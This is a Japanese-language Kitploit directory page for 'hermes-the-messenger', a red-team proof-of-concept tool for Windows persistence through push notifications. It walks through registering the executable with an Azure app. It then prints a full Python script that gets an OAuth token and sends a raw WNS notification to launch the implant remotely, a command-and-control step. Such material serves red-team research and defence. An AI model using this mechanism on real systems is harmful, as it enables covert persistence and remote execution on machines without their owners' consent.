Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
hermes-the-messenger — Windows上でプッシュ通知を介して永続化を実現するPoC | Kitploit
ツール/GitHubGitHub/persistent-security/hermes-the-messenger
永続化メカニズムポストエクスプロイトコマンド&コントロールレッドチーミング
GitHubpersistent-security/hermes-the-messenger

hermes-the-messenger

Windows上でプッシュ通知を介して永続化を実現するPoC

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
484123年前Kitploit レビュー済み

Hermes the messenger

Windows でプッシュ通知を介して永続化を実現する PoC

技術的な詳細と背景については、こちらのブログ記事をお読みください: https://www.persistent-security.net/post/beacon-on-demand-abusing-push-notifications-for-persistence

使い方

何はともあれ、Azure のセットアップが必要です。次に、プッシュ通知のために自身を登録するため、実行可能ファイルを一度実行する必要があります。引数として Azure アプリのオブジェクト ID を渡すだけで、うまくいけば、Microsoft から受信したチャネル Uri が出力されます。その時点でアプリを閉じて問題ありません。

hermes.exe <object_id>

SDK 1.3 がインストールされていない場合、バイナリは必要な拡張機能と一緒にそれをデプロイしようとします。

チャネル Uri を取得したら、テナントの詳細を使って通知 API を呼び出すことで、別のマシンからリモートで実行可能ファイルを起動し、魔法が起こるのを確認できます。

import requests

secret = "4r8Q~XW6U_PmJYg6Eu_jV22DWlsnhyJBIrdpV"
app_id = "CA899E11-71CF-4DB3-962C-0EA65151C132" #not the object id but the Azure app id
tenant_id = "E83F2382-F012-475A-9A4C-30545F429FB7"
channel_uri = "https://wns2-am3p.notify.windows.com/?token=AwYAAAAiYI4p...."

def send_notification(secret, app_id, tenant_id, channel_uri, notification_data):
    # Acquire token
    url = f"https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/token"
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    data = {
        'grant_type': 'client_credentials',
        'client_id': app_id,
        'client_secret': secret,
        'scope': 'https://wns.windows.com/.default'
    }
    response = requests.post(url, headers=headers, data=data)
    response_json = response.json()
    token = response_json['access_token']

    # Send notification
    headers = {
        'Content-Type': 'application/octet-stream',
        'Authorization': f'Bearer {token}',
        'X-WNS-Type': 'wns/raw',
    }
    response = requests.post(channel_uri, headers=headers, data=notification_data)
    return response.status_code, response.text
	
	
send_notification(secret, app_id, tenant_id, channel_uri, "This is a notification")

デモ

https://github.com/persistent-security/hermes-the-messenger/assets/134269747/1de3afdc-79dc-4de6-827b-6acba44f910b

ツールをダウンロード